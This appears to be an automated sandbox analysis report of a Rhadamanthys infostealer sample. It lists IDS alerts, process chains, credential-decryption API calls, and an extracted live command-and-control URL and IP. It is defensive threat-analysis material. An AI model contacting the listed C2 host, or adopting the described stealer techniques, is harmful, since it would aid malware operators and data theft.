Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 1852, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 8420, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:39:37.676733+010020283713Unknown Traffic192.168.11.304980923.192.229.107443TCP
                      2025-03-17T21:40:41.179922+010020283713Unknown Traffic192.168.11.304985023.192.229.107443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:39:36.358712+010020479051A Network Trojan was detected192.168.11.304980774.125.138.132443TCP
                      2025-03-17T21:39:56.354017+010020479051A Network Trojan was detected192.168.11.304981764.233.185.132443TCP
                      2025-03-17T21:40:10.716194+010020479051A Network Trojan was detected192.168.11.304982264.233.185.132443TCP
                      2025-03-17T21:40:27.202744+010020479051A Network Trojan was detected192.168.11.304984264.233.185.132443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:40:23.832179+010028548242Potentially Bad Traffic185.208.159.1702484192.168.11.3049834TCP
                      2025-03-17T21:40:33.588363+010028548242Potentially Bad Traffic185.208.159.1702484192.168.11.3049849TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-17T21:39:36.358712+010028032742Potentially Bad Traffic192.168.11.304980774.125.138.132443TCP
                      2025-03-17T21:39:56.354017+010028032742Potentially Bad Traffic192.168.11.304981764.233.185.132443TCP
                      2025-03-17T21:40:10.716194+010028032742Potentially Bad Traffic192.168.11.304982264.233.185.132443TCP
                      2025-03-17T21:40:27.202744+010028032742Potentially Bad Traffic192.168.11.304984264.233.185.132443TCP
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2025-03-17T21:40:00.669129+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.11.30 | 49819 | TCP
                      2025-03-17T21:40:23.832179+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.11.30 | 49834 | TCP
                      2025-03-17T21:40:33.588363+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.11.30 | 49849 | TCP
                      2025-03-17T21:40:43.092320+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49851 | TCP
                      2025-03-17T21:40:46.167178+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.11.30 | 49852 | TCP
                      2025-03-17T21:40:49.673981+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49853 | TCP
                      2025-03-17T21:40:56.464174+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49855 | TCP
                      2025-03-17T21:41:03.043213+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49856 | TCP
                      2025-03-17T21:41:09.639230+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49857 | TCP
                      2025-03-17T21:41:16.229226+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49858 | TCP
                      2025-03-17T21:41:22.820962+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49859 | TCP
                      2025-03-17T21:41:29.411574+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49860 | TCP
                      2025-03-17T21:41:36.021500+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49861 | TCP
                      2025-03-17T21:41:42.610407+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.11.30 | 49862 | TCP
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2025-03-17T21:39:35.678841+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49806 | 74.125.138.132 | 443 | TCP
                      2025-03-17T21:39:36.358712+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49807 | 74.125.138.132 | 443 | TCP
                      2025-03-17T21:39:37.518727+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49808 | 104.192.142.25 | 443 | TCP
                      2025-03-17T21:39:55.827928+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49815 | 64.233.185.132 | 443 | TCP
                      2025-03-17T21:39:56.354017+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49817 | 64.233.185.132 | 443 | TCP
                      2025-03-17T21:40:10.166328+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49821 | 64.233.185.132 | 443 | TCP
                      2025-03-17T21:40:10.716194+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49822 | 64.233.185.132 | 443 | TCP
                      2025-03-17T21:40:26.521649+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49838 | 64.233.185.132 | 443 | TCP
                      2025-03-17T21:40:27.202744+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.11.30 | 49842 | 64.233.185.132 | 443 | TCP


                      AV Detection

                      Source: 00000008.00000002.289414109956.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p"}
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586D6B88 CryptUnprotectData,27_2_00007DF4586D6B88
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Code function: 50_3_00007DF423DA3838 CryptProtectData,CreateFileW,WriteFile,CloseHandle,free,50_3_00007DF423DA3838
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9A6B60 CryptQueryObject,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore,52_2_6B9A6B60
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9A6960 CryptHashCertificate,52_2_6B9A6960
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6BA08EEC zip_fopen_index,zip_fopen_index_encrypted,52_2_6BA08EEC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6BA04312 CryptAcquireContextW,GetLastError,CryptReleaseContext,52_2_6BA04312
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B93A591 CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,52_2_6B93A591
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9A592F CryptVerifySignatureW,CryptDestroyHash,CryptDestroyKey,52_2_6B9A592F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9A58C9 CryptHashData,52_2_6B9A58C9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9A570A CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptCreateHash,52_2_6B9A570A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6BA0D76E zip_fopen_index_encrypted,zip_source_open,zip_source_free,52_2_6BA0D76E
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B98552C SafeArrayGetLBound,CryptUnprotectData,GetLastError,LocalFree,52_2_6B98552C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_7F0BE67C CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,52_2_7F0BE67C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_7F0B4FA6 memset,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,52_2_7F0B4FA6
                      Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_ae6b028d-2
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
                      Source: unknown | HTTPS traffic detected: 74.125.138.132:443 -> 192.168.11.30:49806 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 150.171.27.12:443 -> 192.168.11.30:49805 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.192.142.25:443 -> 192.168.11.30:49808 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 23.192.229.107:443 -> 192.168.11.30:49809 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49815 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49821 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 64.233.185.132:443 -> 192.168.11.30:49838 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 23.192.229.107:443 -> 192.168.11.30:49850 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49851 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49853 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49855 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49856 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49857 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49858 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49859 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49860 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49861 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 185.208.159.170:443 -> 192.168.11.30:49862 version: TLS 1.2
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: wkernel32.pdb source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000013.00000003.289411881417.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289412522901.00000000053F0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289635046903.0000022D0CFF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000021.00000003.289634553663.0000022D0CE00000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289666544287.00000217CE5E0000.00000004.00000001.00020000.00000000.sdmp, msedge.exe, 00000026.00000003.289667109372.00000217CE7D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: svchost.exe, 00000013.00000003.289413502649.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414086820.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe, 00000022.00000002.289639624751.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp, elevation_service.exe, 00000022.00000000.289636577659.00007FF652B16000.00000002.00000001.01000000.00000012.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdb source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp
                      Source: Binary string: AvastBrowserUpdate_unsigned.pdb source: AvastBrowserUpdate.exe
                      Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000013.00000003.289415524202.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000013.00000003.289414994151.0000000005320000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289414786038.0000000005200000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_elf.dll.pdbOGP source: msedge.exe, 00000026.00000002.289674194363.00007FFB6AFC5000.00000002.00000001.01000000.00000015.sdmp
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                      Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586D1618 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,27_2_00007DF4586D1618
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_00FEC126 FindFirstFileExW,52_2_00FEC126
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B926118 FindFirstFileW,FindClose,FindNextFileW,52_2_6B926118
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8F7A07 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,52_2_6B8F7A07
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8F78C0 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F78C0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9392EE FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,52_2_6B9392EE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8F7789 FindFirstFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F7789
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8FD6DE FindFirstFileW,FindNextFileW,FindClose,52_2_6B8FD6DE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8F9507 FindFirstFileW,FindNextFileW,FindClose,52_2_6B8F9507
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B91944D FindFirstFileW,FindNextFileW,FindClose,52_2_6B91944D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_05B778D9 GetLogicalDriveStringsW,QueryDosDeviceW,7_2_05B778D9
                      Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe
                      Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                      Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                      Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                      Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                      Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\System32\svchost.exe | Code function: 4x nop then dec esp 27_2_0000018CD28F0511
                      Source: C:\Windows\System32\svchost.exe | Code function: 4x nop then dec esp 27_2_00007DF4586E25B1
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Code function: 4x nop then dec esp 33_2_0000022D0AE425B1
                      Source: chrome.exe | Memory has grown: Private usage: 1MB later: 27MB

                      Networking

                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49819
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49849
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49851
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49834
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:2484 -> 192.168.11.30:49852
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49856
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49853
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49861
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49862
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49857
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49855
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49860
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49858
                      Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.208.159.170:443 -> 192.168.11.30:49859
                      Source: Network traffic | Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49807 -> 74.125.138.132:443
                      Source: Network traffic | Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49822 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49817 -> 64.233.185.132:443
                      Source: Network traffic | Suricata IDS: 2047905 - Severity 1 - ET MALWARE Observed Malicious Powershell Loader Payload Request (GET) : 192.168.11.30:49842 -> 64.233.185.132:443
                      Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 185.208.159.170 2484
                      Source: Malware configuration extractor | URLs: https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p
                      Source: global traffic | TCP traffic: 192.168.11.30:49819 -> 185.208.159.170:2484
                      Source: Joe Sandbox View | IP Address: 94.198.159.10 94.198.159.10
                      Source: Joe Sandbox View | IP Address: 169.229.128.134 169.229.128.134
                      Source: Joe Sandbox View | IP Address: 193.171.23.163 193.171.23.163
                      Source: Joe Sandbox View | IP Address: 162.159.200.123 162.159.200.123
                      Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Joe Sandbox View | JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
